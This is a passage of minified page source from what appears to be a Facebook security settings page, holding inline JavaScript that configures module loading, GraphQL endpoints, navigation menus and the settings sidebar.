o","zpNP2"],"needsAsync":1,"module":1},"ChatOpenTabEventLogger":{"resources":["IO8eo","q+9No"],"needsAsync":1,"module":1},"MercuryThreads":{"resources":["BEw9R","\\/NvwD","Bee0v","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","sQ7ef"],"needsAsync":1,"module":1},"MercuryOrderedThreadlist":{"resources":["BEw9R","\\/NvwD","0k9b3","Bee0v","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","sQ7ef"],"needsAsync":1,"module":1},"MercuryServerRequests":{"resources":["BEw9R","\\/NvwD","Bee0v","IO8eo","rzQjB","zpNP2","q+9No","AYvAm","sQ7ef"],"needsAsync":1,"module":1},"MercuryThreadInformer":{"resources":["IO8eo","q+9No"],"needsAsync":1,"module":1},"MessengerGraphQLThreadlistFetcher.bs":{"resources":["BEw9R","Bee0v","IO8eo","rzQjB","q+9No","Av0f1"],"needsAsync":1,"module":1}});}}); </script> <script> requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["Adbbx","L4sg3","onpAC","87rxF","hv63h","P5aPI","vjHYq","uSKfe"]);}); </script> <script> JSCC.init(({"j0lWCVaR02nqusO6ZI0":function(){return new FutureSideNav();\}})); require("TimeSlice").guard(function() {require("ServerJSDefine").handleDefines([["AsyncRequestConfig",[],{"retryOnNetworkError":"1","logAsyncRequest":false,"immediateDispatch":false,"useFetchStreamAjaxPipeTransport":true},328],["CoreWarningGK",[],{"forceWarning":false},725],["DliteBootloadConfig",["XRelayBootloadController"],{"Controller":{"__m":"XRelayBootloadController"},"PKG_COHORT_KEY":"__pc","subdomain":"www"},837],["FbtLogger",[],{"logger":null},288],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlPhonologicalRules",[],{"meta":{"\\/_B\\/":"([.,!?\\\\s]|^)","\\/_E\\/":"([.,!?\\\\s]|$)"},"patterns":{"\\/\\u0001(.*)('|&#039;)s\\u0001(?:'|&#039;)s(.*)\\/":"\\u0001$1$2s\\u0001$3","\\/_\\u0001([^\\u0001]*)\\u0001\\/":"javascript"}},1496],["IntlViewerContext",[],{"GENDER":1},772],["NumberFormatConfig",[],{"decimalSeparator":".","numberDelimiter":",","minDigitsForThousandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["ReactFiberErrorLoggerConfig",[],{"bugNubClickTargetClassName":null,"enableDialog":false},2115],["ReactGK",[],{"debugRenderPhaseSideEffects":false,"alwaysUseRequestIdleCallbackPolyfill":true,"fiberAsyncScheduling":false,"unmountOnBeforeClearCanvas":true,"fireGetDerivedStateFromPropsOnStateUpdates":true},998],["RelayAPIConfigDefaults",["__inst_84473062_0_1","__inst_84473062_0_2","__inst_84473062_0_3"],{"accessToken":"","actorID":"100022900869586","enableNetworkLogger":false,"fetchTimeout":30000,"graphBatchURI":{"__m":"__inst_84473062_0_1"},"graphURI":{"__m":"__inst_84473062_0_2"},"retryDelays":[1000,3000],"useXController":true,"xhrEncoding":null,"subscriptionTopicURI":{"__m":"__inst_84473062_0_3"},"withCredentials":false},926],["SessionNameConfig",[],{"seed":"1yV0"},757],["ZeroCategoryHeader",[],\{},1127],["ZeroRewriteRules",[],{"rewrite_rules":\{},"whitelist":{"\\/hr\\/r":1,"\\/hr\\/p":1,"\\/zero\\/unsupported_browser\\/":1,"\\/zero\\/policy\\/optin":1,"\\/zero\\/optin\\/write\\/":1,"\\/zero\\/optin\\/legal\\/":1,"\\/zero\\/optin\\/free\\/":1,"\\/about\\/privacy\\/":1,"\\/about\\/privacy\\/update\\/":1,"\\/about\\/privacy\\/update":1,"\\/zero\\/toggle\\/welcome\\/":1,"\\/work\\/landing":1,"\\/work\\/login\\/":1,"\\/work\\/email\\/":1,"\\/ai.php":1,"\\/js_dialog_resources\\/dialog_descriptions_android.json":0,"\\/connect\\/jsdialog\\/MPlatformAppInvitesJSDialog\\/":0,"\\/connect\\/jsdialog\\/MPlatformOAuthShimJSDialog\\/":0,"\\/connect\\/jsdialog\\/MPlatformLikeJSDialog\\/":0,"\\/qp\\/interstitial\\/":1,"\\/qp\\/action\\/redirect\\/":1,"\\/qp\\/action\\/close\\/":1,"\\/zero\\/support\\/ineligible\\/":1,"\\/zero_balance_redirect\\/":1,"\\/zero_balance_redirect":1,"\\/l.php":1,"\\/lsr.php":1,"\\/ajax\\/dtsg\\/":1,"\\/checkpoint\\/block\\/":1,"\\/exitdsite":1,"\\/zero\\/balance\\/pixel\\/":1,"\\/zero\\/balance\\/":1,"\\/zero\\/balance\\/carrier_landing\\/":1,"\\/tr":1,"\\/tr\\/":1,"\\/sem_campaigns\\/sem_pixel_test\\/":1,"\\/bookmarks\\/flyout\\/body\\/":1,"\\/zero\\/subno\\/":1,"\\/confirmemail.php":1,"\\/policies\\/":1,"\\/mobile\\/internetdotorg\\/classifier":1,"\\/zero\\/dogfooding":1,"\\/xti.php":1,"\\/4oh4.php":1,"\\/autologin.php":1,"\\/birthday_help.php":1,"\\/checkpoint\\/":1,"\\/contact-importer\\/":1,"\\/cr.php":1,"\\/legal\\/terms\\/":1,"\\/login.php":1,"\\/login\\/":1,"\\/mobile\\/account\\/":1,"\\/n\\/":1,"\\/remote_test_device\\/":1,"\\/upsell\\/buy\\/":1,"\\/upsell\\/buyconfirm\\/":1,"\\/upsell\\/buyresult\\/":1,"\\/upsell\\/promos\\/":1,"\\/upsell\\/continue\\/":1,"\\/upsell\\/h\\/promos\\/":1,"\\/upsell\\/loan\\/learnmore\\/":1,"\\/upsell\\/purchase\\/":1,"\\/upsell\\/promos\\/upgrade\\/":1,"\\/upsell\\/buy_redirect\\/":1,"\\/upsell\\/loan\\/buyconfirm\\/":1,"\\/upsell\\/loan\\/buy\\/":1,"\\/upsell\\/sms\\/":1,"\\/wap\\/a\\/channel\\/reconnect.php":1,"\\/wap\\/a\\/nux\\/wizard\\/nav.php":1,"\\/wap\\/appreg.php":1,"\\/wap\\/birthday_help.php":1,"\\/wap\\/c.php":1,"\\/wap\\/confirmemail.php":1,"\\/wap\\/cr.php":1,"\\/wap\\/login.php":1,"\\/wap\\/r.php":1,"\\/zero\\/datapolicy":1,"\\/a\\/timezone.php":1,"\\/a\\/bz":1,"\\/bz\\/reliability":1,"\\/r.php":1,"\\/mr\\/":1,"\\/reg\\/":1,"\\/registration\\/log\\/":1,"\\/terms\\/":1,"\\/f123\\/":1,"\\/expert\\/":1,"\\/experts\\/":1,"\\/terms\\/index.php":1,"\\/terms.php":1,"\\/srr\\/":1,"\\/msite\\/redirect\\/":1,"\\/fbs\\/pixel\\/":1,"\\/contactpoint\\/preconfirmation\\/":1,"\\/contactpoint\\/cliff\\/":1,"\\/contactpoint\\/confirm\\/submit\\/":1,"\\/contactpoint\\/confirmed\\/":1,"\\/contactpoint\\/login\\/":1,"\\/preconfirmation\\/contactpoint_change\\/":1,"\\/help\\/contact\\/":1,"\\/survey\\/":1,"\\/upsell\\/loyaltytopup\\/accept\\/":1,"\\/settings\\/":1}},1478],["KSConfig",[],{"killed":{"__set":["POCKET_MONSTERS_CREATE","POCKET_MONSTERS_DELETE","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","PREVENT_INFINITE_URL_REDIRECT","POCKET_MONSTERS_UPDATE_NAME"]}},2580],["HotReloadConfig",[],{"isEnabled":false},2649],["IntlHoldoutGK",[],{"inIntlHoldout":false},2827],["IntlNumberTypeConfig",[],{"impl":"if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }"},3405],["BanzaiRefactored",["BanzaiOld"],{"module":{"__m":"BanzaiOld"}},3421],["PageTransitionsConfig",[],{"reloadOnBootloadError":true},1067],["LinkshimHandlerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","link_react_default_hash":"AT1ZglwzagyvuQaYIQAIpeMLuljU1w6gQZbQjQb0vrlSrtvKg9eh44532Wp_69sCqn2QyjazzLjBiSHc2IWy9mGV7_bV_1RPLQuBbp5uQZ8_qPLIdcYiarsuHMLyrA","untrusted_link_default_hash":"AT0Z9iWK7GxoBLajyPpKNZ9ch5sieE44GcS_vmuVwMjEj1xxUFRh97Ug0XzutaLKh8NQMWJMSaxQrqYUMi57zDF0puGREnBCF6Rz7ajq5lsHr_2ixEWLdoHYu7r0cQ","linkshim_host":"l.facebook.com","use_rel_no_opener":true,"always_use_https":true,"onion_always_shim":true,"middle_click_requires_event":true,"www_safe_js_mode":"asynclazy","m_safe_js_mode":"MLynx_asynclazy"},27],["LoadingMarkerGated",[],{"component":null},2874],["SecuritySettingsLoginAlertsConfig",[],{"renderInReact":false,"gkUnvettedOnly":true},2828],["FbtQTOverrides",[],{"overrides":\{}},551],["BanzaiConfig",[],{"EXPIRY":86400000,"MAX_SIZE":10000,"MAX_WAIT":150000,"RESTORE_WAIT":150000,"blacklist":["time_spent"],"gks":{"boosted_component":true,"boosted_pagelikes":true,"jslogger":true,"mercury_send_error_logging":true,"platform_oauth_client_events":true,"visibility_tracking":true,"graphexplorer":true,"gqls_web_logging":true,"sticker_search_ranking":true}},7]]);require("InitialJSLoader").handleServerJS({"instances":[["__inst_5b4d0c00_0_0",["Menu","XUIMenuWithSquareCorner","XUIMenuTheme"],[[],{"id":"u_0_0","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"theme":{"__m":"XUIMenuTheme"}}],2],["__inst_5b4d0c00_0_1",["Menu","MenuItem","__markup_3310c079_0_c","__markup_3310c079_0_d","__markup_3310c079_0_e","__markup_3310c079_0_f","XUIMenuWithSquareCorner","XUIMenuTheme"],[[{"value":"key_shortcuts","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_c"},"label":"Keyboard shortcut help...","title":"","className":null},{"href":"\\/help\\/accessibility","target":"_blank","value":"help_center","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_d"},"label":"Accessibility Help Centre","title":"","className":null},{"href":"\\/help\\/contact\\/accessibility","target":"_blank","value":"submit_feedback","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_e"},"label":"Submit feedback","title":"","className":null},{"href":"\\/accessibility","target":"_blank","value":"facebook_page","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_f"},"label":"Updates from Facebook Accessibility","title":"","className":null}],{"id":"u_0_2","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"theme":{"__m":"XUIMenuTheme"}}],2],["__inst_5b4d0c00_0_2",["Menu","MenuItem","__markup_3310c079_0_0","__markup_3310c079_0_1","__markup_3310c079_0_2","__markup_3310c079_0_3","__markup_3310c079_0_4","__markup_3310c079_0_5","__markup_3310c079_0_6","__markup_3310c079_0_7","__markup_3310c079_0_8","__markup_3310c079_0_9","__markup_3310c079_0_a","__markup_3310c079_0_b","XUIMenuWithSquareCorner","XUIMenuTheme"],[[{"href":"\\/events\\/","value":"events","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_0"},"label":"Events","title":"","className":null},{"href":"\\/friends\\/requests","value":"requests","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_1"},"label":"Friend requests","title":"","className":null},{"href":"https:\\/\\/www.facebook.com\\/me\\/friends","value":"friends","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_2"},"label":"Friends","title":"","className":null},{"href":"\\/groups\\/","value":"groups","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_3"},"label":"Groups","title":"","className":null},{"href":"\\/marketplace\\/","value":"marketplace","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_4"},"label":"Marketplace","title":"","className":null},{"href":"\\/messages\\/t\\/","value":"messenger","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_5"},"label":"Messenger","title":"","className":null},{"href":"\\/","value":"newsfeed","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_6"},"label":"News Feed","title":"","className":null},{"href":"\\/notifications","value":"notifications","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_7"},"label":"Notifications","title":"","className":null},{"href":"\\/pages\\/","value":"pages","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_8"},"label":"Pages","title":"","className":null},{"href":"https:\\/\\/www.facebook.com\\/me","value":"profile","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_9"},"label":"Profile","title":"","className":null},{"href":"\\/settings","value":"settings","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_a"},"label":"Settings","title":"","className":null},{"href":"\\/watch\\/","value":"watch","ctor":{"__m":"MenuItem"},"markup":{"__m":"__markup_3310c079_0_b"},"label":"Watch","title":"","className":null}],{"id":"u_0_1","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"theme":{"__m":"XUIMenuTheme"}}],2],["__inst_e5ad243d_0_0",["PopoverMenu","__inst_1de146dc_0_2","__elem_ec77afbd_0_2","__inst_5b4d0c00_0_1"],[{"__m":"__inst_1de146dc_0_2"},{"__m":"__elem_ec77afbd_0_2"},{"__m":"__inst_5b4d0c00_0_1"},[]],2],["__inst_e5ad243d_0_1",["PopoverMenu","__inst_1de146dc_0_1","__elem_ec77afbd_0_1","__inst_5b4d0c00_0_2"],[{"__m":"__inst_1de146dc_0_1"},{"__m":"__elem_ec77afbd_0_1"},{"__m":"__inst_5b4d0c00_0_2"},[]],2],["__inst_e5ad243d_0_2",["PopoverMenu","__inst_1de146dc_0_0","__elem_ec77afbd_0_0","__inst_5b4d0c00_0_0"],[{"__m":"__inst_1de146dc_0_0"},{"__m":"__elem_ec77afbd_0_0"},{"__m":"__inst_5b4d0c00_0_0"},[]],2],["__inst_1de146dc_0_0",["Popover","__elem_1de146dc_0_0","__elem_ec77afbd_0_0","ContextualLayerAutoFlip","ContextualDialogArrow"],[{"__m":"__elem_1de146dc_0_0"},{"__m":"__elem_ec77afbd_0_0"},[{"__m":"ContextualLayerAutoFlip"},{"__m":"ContextualDialogArrow"}],{"alignh":"left","position":"below"}],2],["__inst_1de146dc_0_1",["Popover","__elem_1de146dc_0_1","__elem_ec77afbd_0_1","ContextualLayerAutoFlip","ContextualDialogArrow"],[{"__m":"__elem_1de146dc_0_1"},{"__m":"__elem_ec77afbd_0_1"},[{"__m":"ContextualLayerAutoFlip"},{"__m":"ContextualDialogArrow"}],{"alignh":"left","position":"below"}],2],["__inst_1de146dc_0_2",["Popover","__elem_1de146dc_0_2","__elem_ec77afbd_0_2","ContextualLayerAutoFlip","ContextualDialogArrow"],[{"__m":"__elem_1de146dc_0_2"},{"__m":"__elem_ec77afbd_0_2"},[{"__m":"ContextualLayerAutoFlip"},{"__m":"ContextualDialogArrow"}],{"alignh":"right","position":"below"}],2],["__inst_d496507d_0_0",["SecuritySettingsRoute","__inst_84473062_0_0"],[{"tab":"security","section":"password","view":""},{"__m":"__inst_84473062_0_0"}],1],["__inst_7d4989a4_0_0",["JewelBase","__elem_7d4989a4_0_0","__inst_782ee166_0_0","__inst_82a80337_0_0"],[{"__m":"__elem_7d4989a4_0_0"},{"badge":{"__m":"__inst_782ee166_0_0"},"bootload_args":{"inbox_folder":"[fb]requests"},"bootload_eager_modules":null,"bootload_conf":null,"bootload_module":{"__m":"__inst_82a80337_0_0"},"businessID":null,"count":0,"keepOpenForSnowlift":true,"label":"Friend requests","name":"requests"}],1],["__inst_d2a0ce9e_0_0",["PopoverLoadingMenu","XUIMenuWithSquareCorner","XUIMenuTheme"],[{"behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"theme":{"__m":"XUIMenuTheme"}}],2],["__inst_03686024_0_0",["PopoverAsyncMenu","__inst_1de146dc_0_3","__elem_072b8e64_0_0","__inst_d2a0ce9e_0_0","ContextualDialogArrow"],[{"__m":"__inst_1de146dc_0_3"},{"__m":"__elem_072b8e64_0_0"},{"__m":"__inst_d2a0ce9e_0_0"},"\\/bluebar\\/modern_settings_menu\\/?help_type=103377403178977&show_contextual_help=1",[{"__m":"ContextualDialogArrow"}],null],1],["__inst_1de146dc_0_3",["Popover","__elem_1de146dc_0_3","__elem_072b8e64_0_0","ContextualDialogArrow"],[{"__m":"__elem_1de146dc_0_3"},{"__m":"__elem_072b8e64_0_0"},[{"__m":"ContextualDialogArrow"}],{"alignh":"right","position":"below"}],2],["__inst_7d4989a4_0_1",["JewelBase","__elem_7d4989a4_0_1","__inst_782ee166_0_1","__inst_e3ef733c_0_0","__inst_82a80337_0_1"],[{"__m":"__elem_7d4989a4_0_1"},{"badge":{"__m":"__inst_782ee166_0_1"},"bootload_args":{"endPoint":null,"list":{"__m":"__inst_e3ef733c_0_0"},"unseenNotifs":[],"badgeAnimationData":null},"bootload_eager_modules":null,"bootload_conf":null,"bootload_module":{"__m":"__inst_82a80337_0_1"},"businessID":null,"count":0,"keepOpenForSnowlift":true,"label":"Notifications","name":"notifications"}],1],["__inst_5a9a2560_0_0",["NotificationJewelHeaderController","__elem_072b8e64_0_1"],[{"__m":"__elem_072b8e64_0_1"},null],1],["__inst_e3ef733c_0_0",["NotificationJewelListController","__elem_a588f507_0_9"],[{"__m":"__elem_a588f507_0_9"},{"tracking":"{\\"ref\\":\\"notif_jewel\\",\\"jewel\\":\\"notifications\\"}","business-id":"","endpoint":"WebNotificationsPayloadPagelet","maxHeight":600,"upsell":null}],2],["__inst_7d4989a4_0_2",["JewelBase","__elem_7d4989a4_0_2","__inst_782ee166_0_2","MercuryJewelBootloadModules","MercuryMessengerJewelPerfConfig","__inst_82a80337_0_2"],[{"__m":"__elem_7d4989a4_0_2"},{"badge":{"__m":"__inst_782ee166_0_2"},"bootload_args":{"message_counts":[{"unread_count":13,"unseen_count":0,"seen_timestamp":1529234589670,"folder":"inbox"},{"unread_count":0,"unseen_count":0,"seen_timestamp":0,"folder":"pending"}],"payload_source":"server_initial_data"},"bootload_eager_modules":{"__m":"MercuryJewelBootloadModules"},"bootload_conf":{"__m":"MercuryMessengerJewelPerfConfig"},"bootload_module":{"__m":"__inst_82a80337_0_2"},"businessID":null,"count":0,"keepOpenForSnowlift":true,"label":"Messages","name":"mercurymessages"}],1],["__inst_84473062_0_0",["URI"],["https:\\/\\/www.facebook.com\\/settings?tab=security&section=password&view"],1],["__inst_782ee166_0_0",["XUIBadge","__elem_a8bc011b_0_0"],[{"target":{"__m":"__elem_a8bc011b_0_0"},"count":0,"maxcount":99,"label":null}],1],["__inst_82a80337_0_0",["JSResourceReference"],["RequestsJewel"],1],["__inst_782ee166_0_1",["XUIBadge","__elem_a8bc011b_0_1"],[{"target":{"__m":"__elem_a8bc011b_0_1"},"count":0,"maxcount":99,"label":null}],1],["__inst_82a80337_0_1",["JSResourceReference"],["NotificationJewelController"],1],["__inst_782ee166_0_2",["XUIBadge","__elem_a8bc011b_0_2"],[{"target":{"__m":"__elem_a8bc011b_0_2"},"count":0,"maxcount":99,"label":null}],1],["__inst_82a80337_0_2",["JSResourceReference"],["MercuryJewel"],1],["__inst_84473062_0_1",["URI"],["\\/api\\/graphqlbatch\\/"],1],["__inst_84473062_0_2",["URI"],["\\/api\\/graphql\\/"],1],["__inst_84473062_0_3",["URI"],["\\/dlite\\/skywalker_topic\\/"],1]],"markup":[["__markup_3310c079_0_c",{"__html":"Keyboard shortcut help..."},1],["__markup_3310c079_0_d",{"__html":"Accessibility Help Centre"},1],["__markup_3310c079_0_e",{"__html":"Submit feedback"},1],["__markup_3310c079_0_f",{"__html":"Updates from Facebook Accessibility"},1],["__markup_3310c079_0_0",{"__html":"Events"},1],["__markup_3310c079_0_1",{"__html":"Friend requests"},1],["__markup_3310c079_0_2",{"__html":"Friends"},1],["__markup_3310c079_0_3",{"__html":"Groups"},1],["__markup_3310c079_0_4",{"__html":"Marketplace"},1],["__markup_3310c079_0_5",{"__html":"Messenger"},1],["__markup_3310c079_0_6",{"__html":"News Feed"},1],["__markup_3310c079_0_7",{"__html":"Notifications"},1],["__markup_3310c079_0_8",{"__html":"Pages"},1],["__markup_3310c079_0_9",{"__html":"Profile"},1],["__markup_3310c079_0_a",{"__html":"Settings"},1],["__markup_3310c079_0_b",{"__html":"Watch"},1]],"elements":[["__elem_0d08bd8f_0_0","bluebarRoot",1],["__elem_cfd7b2a8_0_0","u_0_b",1],["__elem_efa9dffa_0_0","u_0_c",1],["__elem_559218ec_0_0","u_0_d",1],["__elem_e79fe434_0_0","u_0_e",1],["__elem_da4ef9a3_0_0","u_0_f",1],["__elem_a588f507_0_7","u_0_g",1],["__elem_7d4989a4_0_0","fbRequestsJewel",1],["__elem_a8bc011b_0_0","requestsCountValue",1],["__elem_9f5fac15_0_2","fbRequestsList_wrapper",1],["__elem_7d4989a4_0_2","u_0_h",1],["__elem_a8bc011b_0_2","mercurymessagesCountValue",1],["__elem_072b8e64_0_2","u_0_i",1],["__elem_7d4989a4_0_1","fbNotificationsJewel",1],["__elem_a8bc011b_0_1","notificationsCountValue",1],["__elem_072b8e64_0_1","u_0_j",1],["__elem_a588f507_0_9","u_0_k",1],["__elem_f67c501f_0_0","u_0_l",1],["__elem_a588f507_0_8","u_0_8",1],["__elem_1de146dc_0_3","logoutMenu",1],["__elem_072b8e64_0_0","pageLoginAnchor",2],["__elem_a588f507_0_3","u_0_m",1],["__elem_a588f507_0_2","u_0_n",1],["__elem_3fc3da18_0_0","u_0_o",1],["__elem_51be6cb7_0_0","u_0_p",1],["__elem_1de146dc_0_0","u_0_q",1],["__elem_ec77afbd_0_0","u_0_r",2],["__elem_1de146dc_0_1","u_0_s",1],["__elem_ec77afbd_0_1","u_0_t",2],["__elem_1de146dc_0_2","u_0_u",1],["__elem_ec77afbd_0_2","u_0_v",2],["__elem_9f5fac15_0_3","pagelet_bluebar",1],["__elem_45e94dd8_0_0","pagelet_bluebar",2],["__elem_a588f507_0_1","globalContainer",2],["__elem_a588f507_0_4","content",1],["__elem_a588f507_0_0","SettingsPage_Content",1],["__elem_a588f507_0_5","u_0_w",1],["__elem_a588f507_0_6","u_0_x",1],["__elem_9f5fac15_0_0","pagelet_sidebar",1],["__elem_9f5fac15_0_1","pagelet_dock",1]],"require":[["WebPixelRatio","startDetecting",[],[1,false]],["SecuritySettingsRouteHandler","init",[],[]],["SettingsController","init",["__elem_a588f507_0_0"],[{"__m":"__elem_a588f507_0_0"}]],["SettingsExitSurvey","launchOnExit",[],["security"]],["Quickling","init",[],[]],["replaceNativeTimer"],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_1"],[{"__m":"__elem_a588f507_0_1"}]],["AccessibilityWebVirtualCursorClickLogger","init",["__elem_45e94dd8_0_0","__elem_a588f507_0_1"],[[{"__m":"__elem_45e94dd8_0_0"},{"__m":"__elem_a588f507_0_1"}]]],["FocusRing","init",[],[]],["WebStorageMonster","schedule",[],[]],["BrowserDimensionsLogger","init",[],[]],["BlueBarFixedBehaviorController","init",["__elem_45e94dd8_0_0"],[{"__m":"__elem_45e94dd8_0_0"}]],["HardwareCSS","init",[],[]],["NavigationAssistantController","init",["__elem_3fc3da18_0_0","__elem_51be6cb7_0_0","__inst_5b4d0c00_0_0","__inst_5b4d0c00_0_1","__inst_5b4d0c00_0_2","__inst_e5ad243d_0_0","__inst_e5ad243d_0_1","__inst_e5ad243d_0_2"],[{"__m":"__elem_3fc3da18_0_0"},{"__m":"__elem_51be6cb7_0_0"},{"__m":"__inst_5b4d0c00_0_0"},{"__m":"__inst_5b4d0c00_0_1"},{"__m":"__inst_5b4d0c00_0_2"},{"accessibilityPopoverMenu":{"__m":"__inst_e5ad243d_0_0"},"globalPopoverMenu":{"__m":"__inst_e5ad243d_0_1"},"sectionsPopoverMenu":{"__m":"__inst_e5ad243d_0_2"}}]],["__inst_e5ad243d_0_2"],["__inst_1de146dc_0_0"],["__inst_e5ad243d_0_1"],["__inst_1de146dc_0_1"],["__inst_e5ad243d_0_0"],["__inst_1de146dc_0_2"],["AsyncRequestNectarLogging"],["RoyalBluebar","fixOnScroll",["__elem_0d08bd8f_0_0"],[{"__m":"__elem_0d08bd8f_0_0"}]],["BlueBarFocusListener","listen",["__elem_e79fe434_0_0"],[{"__m":"__elem_e79fe434_0_0"}]],["ViewasChromeBar","initChromeBar",["__elem_a588f507_0_3"],[{"__m":"__elem_a588f507_0_3"}]],["RelayWeb","bootstrap",["SecuritySettingsRoot.react","__elem_a588f507_0_5","__inst_d496507d_0_0"],[{"Container":{"__m":"SecuritySettingsRoot.react"},"mountNode":{"__m":"__elem_a588f507_0_5"},"route":{"__m":"__inst_d496507d_0_0"},"loggingCallbacks":null}]],["LitestandClassicPlaceHolders","register",["__elem_a588f507_0_6"],["sidebar",{"__m":"__elem_a588f507_0_6"}]],["FacebarBootloader","init",["__elem_efa9dffa_0_0","__elem_559218ec_0_0","__elem_cfd7b2a8_0_0"],[{"__m":"__elem_efa9dffa_0_0"},{"__m":"__elem_559218ec_0_0"},{"__m":"__elem_cfd7b2a8_0_0"},true]],["FocusListener"],["RequiredFormListener"],["FlipDirectionOnKeypress"],["IntlUtils"],["RoyalBluebar","informOnClick",["__elem_a588f507_0_7"],[{"__m":"__elem_a588f507_0_7"}]],["__inst_7d4989a4_0_0"],["NotificationEagerLoader"],["HelpLiteFlyoutBootloader","setHelpType",[],[103377403178977]],["HelpLiteFlyoutBootloader","registerFlyoutElements",["__elem_a588f507_0_8","__elem_f67c501f_0_0"],[{"__m":"__elem_a588f507_0_8"},{"__m":"__elem_f67c501f_0_0"}]],["Tooltip"],["__inst_d2a0ce9e_0_0"],["__inst_03686024_0_0"],["__inst_1de146dc_0_3"],["BrowserPushDirectPromptInstaller","setLogExtraData",[],[{"xout_time":null,"xout_count":0}]],["BrowserPushDirectPromptInstaller","setQEUniverseName",[],["chrome_push_experiments"]],["BrowserPushDirectPromptInstaller","installPush",["__elem_da4ef9a3_0_0"],["\\/sw?s=push",1443096165982425,{"__m":"__elem_da4ef9a3_0_0"},false,false,false,"Chrome",true,true,false]],["GlobalNotificationSubscriptionsSubscription"],["GlobalNotificationSyncSubscription"],["__inst_7d4989a4_0_1"],["__inst_5a9a2560_0_0"],["__inst_e3ef733c_0_0"],["LiveTimer","restart",[],[1529235005]],["__inst_7d4989a4_0_2"],["ChatOpenTab","listenOpenEmptyTabDEPRECATED",["__elem_072b8e64_0_2"],[{"__m":"__elem_072b8e64_0_2"},"MessagesJewelHeader"]]],"contexts":[[{"__m":"__elem_a588f507_0_2"},true],[{"__m":"__elem_a588f507_0_4"},true],[{"__m":"__elem_9f5fac15_0_0"},false],[{"__m":"__elem_9f5fac15_0_1"},false],[{"__m":"__elem_9f5fac15_0_2"},false],[{"__m":"__elem_9f5fac15_0_3"},false]]});}, "ServerJS define", {"root":true})(); onloadRegister_DEPRECATED(function (){JSCC.get("j0lWCVaR02nqusO6ZI0").init($("sideNav"), "", false);}); onloadRegister_DEPRECATED(function (){FutureSideNav.getInstance().initSection({"id":"u_0_3","editEndpoint":null}, [{"id":"navItem_account","key":["account"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_security","key":["security"],"path":[],"type":null,"endpoint":null,"selected":true,"highlighted":false,"children":[]},{"id":"navItem_your_facebook_information","key":["your_facebook_information"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"u_0_4","key":[],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_privacy","key":["privacy"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_timeline","key":["timeline"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_location","key":["location"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_blocking","key":["blocking"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_language","key":["language"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"u_0_5","key":[],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_notifications","key":["notifications"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_mobile","key":["mobile"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_followers","key":["followers"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"u_0_6","key":[],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_applications","key":["applications"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_business_tools","key":["business_tools"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_ads","key":["ads"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_payments","key":["payments"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_support","key":["support"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]},{"id":"navItem_videos","key":["videos"],"path":[],"type":null,"endpoint":null,"selected":false,"highlighted":false,"children":[]}]);}); </script> <!-- BigPipe construction and first response --> <script> var bigPipe = new (require("BigPipe"))({"forceFinish":true,"config":{"flush_pagelets_asap":true,"handle_defines_asap":true,"handle_instances_asap":true,"dispatch_pagelet_replayable_actions":false,"ignore_nonexisting_root_nodes":false}}); </script> <script> bigPipe.beforePageletArrive("first_response") </script> <script> 